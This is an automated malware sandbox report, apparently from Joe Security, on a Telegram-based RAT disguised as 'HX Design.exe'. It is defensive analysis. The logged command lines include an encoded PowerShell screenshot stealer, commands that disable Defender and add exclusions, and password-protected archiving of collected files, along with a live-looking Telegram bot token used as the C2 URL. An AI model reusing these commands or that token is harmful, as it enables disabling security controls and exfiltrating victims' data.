              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HX Design.exe", ParentImage: C:\Users\user\Desktop\HX Design.exe, ParentProcessId: 7524, ParentProcessName: HX Design.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'", ProcessId: 7588, ProcessName: cmd.exe
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2816, TargetFilename: C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8032, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *, ProcessId: 648, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7596, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7704, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7692, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-21T05:57:40.975494+010028577511A Network Trojan was detected192.168.2.449760149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: HX Design.exe.7524.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7941165298:AAE-cxddvAA5WE9BKSZYSVJTX3zwZRZqwIw/sendMessage"}
              Source: HX Design.exeVirustotal: Detection: 50%Perma Link
              Source: HX Design.exeReversingLabs: Detection: 39%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D20901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,73_2_00007FF77D20901C
              Source: HX Design.exeStatic PE information: certificate valid
              Source: HX Design.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672807365.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: HX Design.exe, 00000000.00000003.1669865054.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: HX Design.exe, 00000001.00000002.2108765974.00007FFE01424000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669477724.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671566567.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672348988.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670566316.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672433558.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670164178.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672257497.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: HX Design.exe, 00000001.00000002.2110666490.00007FFE11501000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672348988.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670867826.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669276073.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1673117684.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670767468.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671919991.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: HX Design.exe, 00000001.00000002.2110062071.00007FFE1025B000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: >c.pdb source: powershell.exe, 00000028.00000002.1946049803.000001D19A990000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671060451.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669771704.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: HX Design.exe, 00000001.00000002.2106827061.00007FFDFB868000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672257497.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669963061.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1673117684.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669673863.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670069107.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671566567.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: HX Design.exe, 00000000.00000003.1671427459.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670767468.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: HX Design.exe, 00000000.00000003.1667874865.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2113107108.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: HX Design.exe, 00000000.00000003.1670483179.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671253398.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672984815.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: HX Design.exe, 00000000.00000003.1670955519.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669477724.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670376660.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670483179.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670667043.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: HX Design.exe, 00000001.00000002.2111613092.00007FFE130C1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671162659.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.pdbhP8 source: powershell.exe, 00000028.00000002.1879970672.000001D183AA6000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669276073.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672711559.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1673205368.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670262264.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671342461.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
